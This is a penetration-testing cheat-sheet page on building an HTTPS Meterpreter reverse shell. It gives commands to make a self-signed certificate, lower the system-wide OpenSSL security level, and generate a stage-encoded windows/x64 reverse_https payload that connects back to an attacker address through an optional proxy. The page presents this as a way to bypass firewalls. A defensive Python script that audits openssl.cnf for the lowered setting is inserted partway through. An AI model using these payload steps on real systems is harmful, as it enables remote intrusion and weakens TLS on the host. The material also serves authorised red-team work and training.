# HTTPS Meterpreter

## Overview

> HTTPS Meterpreter is a type of Meterpreter shell that uses the HTTPS protocol for communication between the attacker and the target system. This type of shell is commonly used in situations where the attacker needs to bypass firewall or network restrictions that may prevent other types of shells, such as reverse TCP or bind TCP, from working properly.

## Generating your own self-signed certificate

To generate your own self-signed certificate:

```bash
openssl req -new -x509 -nodes -out cert.crt -keyout priv.key
```

For Metasploit to use the certificate, we concatenate the private key and the certificate into a single .pem file:

```bash
cat priv.key cert.crt > rfc.pem
```

{% hint style="info" %}
We must also change the *CipherString* in the `/etc/ssl/openssl.cnf` config file or our reverse HTTPS shell will not work properly.

First, we will locate this line in the config file:

```bash
CipherString=DEFAULT@SECLEVEL=2
```

and change it to:

```bash
CipherString=DEFAULT
```

{% endhint %}

Finally, we can set the certificate in our Metasploit instance:

```bash
set StagerVerifySSLCert true
set HandlerSSLCert /home/kali/self_cert/rfc.pem
```
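The *CipherString* edit in the procedure above is made in the system's default OpenSSL configuration, which other OpenSSL-based programs on the host also read, so it is worth auditing that file before and after the work and restoring the original line afterwards. The following is an added example, not part of the original page: the sample config excerpt is constructed, and `REQUIRED_LEVEL`, `audit` and the status names are assumptions made for illustration.

```python
import re
import sys

REQUIRED_LEVEL = 2  # assumption: the level in the stock line the page shows

# Constructed sample: openssl.cnf excerpt after the edit described above.
SAMPLE_EDITED = """\
[ssl_sect]
system_default = system_default_sect

[system_default_sect]
MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
CipherString = DEFAULT
"""


def audit(text):
    """Return one finding per active (uncommented) CipherString line."""
    findings, section = [], ""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # '#' starts a comment
        header = re.fullmatch(r"\[\s*(.+?)\s*\]", line)
        if header:
            section = header.group(1)
            continue
        key, sep, value = line.partition("=")
        # Option names in the config file are case-insensitive.
        if not sep or key.strip().lower() != "cipherstring":
            continue
        levels = re.findall(r"@SECLEVEL=(\d)", value)
        level = int(levels[-1]) if levels else None
        if level is None:
            status = "unpinned"  # no explicit level: the library default applies
        else:
            status = "ok" if level >= REQUIRED_LEVEL else "lowered"
        findings.append({"line": no, "section": section,
                         "value": value.strip(), "level": level, "status": status})
    return findings


if __name__ == "__main__":
    # Pass a path such as /etc/ssl/openssl.cnf; with no argument the sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_EDITED
    results = audit(text)
    for f in results:
        print(f"line {f['line']} [{f['section']}] CipherString={f['value']} -> {f['status']}")
    sys.exit(0 if results and all(f["status"] == "ok" for f in results) else 1)
```

The script exits non-zero when the file has no active `CipherString` line or when any such line is below the required level or carries no explicit level, so it can gate a cleanup checklist or a configuration-drift job.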

## Msfconsole generate payload

To generate a Meterpreter payload:

{% code overflow="wrap" %}

```bash
msf6 > use windows/x64/meterpreter/reverse_https
msf6 payload(windows/x64/meterpreter/reverse_https) > set LHOST tun0
LHOST => 192.168.45.5
msf6 payload(windows/x64/meterpreter/reverse_https) > set LPORT 443
LPORT => 443
msf6 payload(windows/x64/meterpreter/reverse_https) > set StagerVerifySSLCert true
StagerVerifySSLCert => true 
msf6 payload(windows/x64/meterpreter/reverse_https) > set HandlerSSLCert ../../payloads/SpaceX.pem
handlersslcert => ../../payloads/SpaceX.pem
msf6 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true

## optional proxy
msf6 exploit(multi/handler) > set HttpProxyHost 172.16.20.50
HttpProxyHost => 172.16.20.50
msf6 exploit(multi/handler) > set HttpProxyPort 8080
HttpProxyPort => 8080

msf6 payload(windows/x64/meterpreter/reverse_https) > generate -f raw -o spacex.bin
```

{% endcode %}

## References

{% embed url="https://ppn.snovvcrash.rocks/pentest/c2/meterpreter" %}
